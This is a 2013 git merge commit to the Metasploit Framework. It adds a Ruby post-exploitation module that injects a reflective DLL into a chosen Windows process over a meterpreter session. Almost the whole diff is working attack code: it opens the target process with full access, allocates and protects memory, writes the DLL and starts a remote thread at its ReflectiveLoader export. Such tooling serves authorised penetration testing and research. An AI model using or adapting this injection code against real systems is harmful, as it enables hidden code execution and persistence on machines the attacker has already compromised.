Merge branch 'post_ref_dll_inj' of https://github.com/Meatballs1/metasploit-framework into Meatballs1-post_ref_dll_inj

2013-03-04 17:39:11 +01:00 · 2013-03-04 17:39:11 +01:00 · 582395412f
parent 2e4760c486 15d505f7a9
commit 582395412f
1 changed files with 98 additions and 0 deletions
--- a/modules/post/windows/manage/reflective_dll_inject.rb
+++ b/modules/post/windows/manage/reflective_dll_inject.rb
@ -0,0 +1,98 @@
+##
+# ## This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'rex'
+
+class Metasploit3 < Msf::Post
+
+	def initialize(info={})
+		super( update_info( info,
+			'Name'		=> 'Windows Manage Reflective DLL Injection Module',
+			'Description'	=> %q{
+				This module will inject into the memory of a process a specified Reflective DLL.
+			},
+			'License'	=> MSF_LICENSE,
+			'Author'	=> [ 'Ben Campbell <eat_meatballs[at]hotmail.co.uk>'],
+			'Platform'	=> [ 'win' ],
+			'SessionTypes'	=> [ 'meterpreter' ],
+			'References'	=> [ [ 'URL', 'https://github.com/stephenfewer/ReflectiveDLLInjection' ] ]
+		))
+
+		register_options(
+			[
+				OptPath.new('PATH',[true, 'Reflective DLL to inject into memory of a process.']),
+				OptInt.new('PID',[true, 'Process Identifier to inject of process to inject payload.']),
+			], self.class)
+	end
+
+	# Run Method for when run command is issued
+	def run
+		# syinfo is only on meterpreter sessions
+		print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil?
+
+		dll = ''
+		offset = nil
+		begin
+			File.open( datastore['PATH'], "rb" ) { |f| dll += f.read(f.stat.size) }
+
+			pe = Rex::PeParsey::Pe.new( Rex::ImageSource::Memory.new( dll ) )
+
+			pe.exports.entries.each do |entry|
+				if( entry.name =~ /^\S*ReflectiveLoader\S*/ )
+					offset = pe.rva_to_file_offset( entry.rva )
+					break
+				end
+			end
+
+			raise "Can't find an exported ReflectiveLoader function!" if offset == 0
+		rescue
+			print_error( "Failed to read and parse Dll file: #{$!}" )
+			return
+		end
+
+		inject_into_pid(dll, datastore['PID'], offset)
+	end
+
+	def inject_into_pid(pay, pid, offset)
+
+		if offset.nil?
+			print_error("Reflective Loader offset is nil.")
+			return
+		end
+
+		if pay.nil? or pay.empty?
+			print_error("Invalid DLL.")
+			return
+		end
+
+		if pid.nil? or pid == 0
+			print_error("Invalid PID.")
+			return
+		end
+
+		print_status("Injecting #{datastore['DLL_PATH']} into process ID #{pid}")
+		begin
+			print_status("Opening process #{pid}")
+			host_process = client.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS)
+			print_status("Generating payload")
+			print_status("Allocating memory in procees #{pid}")
+			mem = host_process.memory.allocate(pay.length + (pay.length % 1024))
+			# Ensure memory is set for execution
+			host_process.memory.protect(mem)
+			print_status("Allocated memory at address #{"0x%.8x" % mem}, for #{pay.length} bytes")
+			print_status("Writing the stager into memory...")
+			host_process.memory.write(mem, pay)
+			host_process.thread.create(mem+offset, 0)
+			print_good("Successfully injected payload in to process: #{pid}")
+		rescue ::Exception => e
+			print_error("Failed to Inject Payload to #{pid}!")
+			print_error(e.to_s)
+		end
+	end
+end
+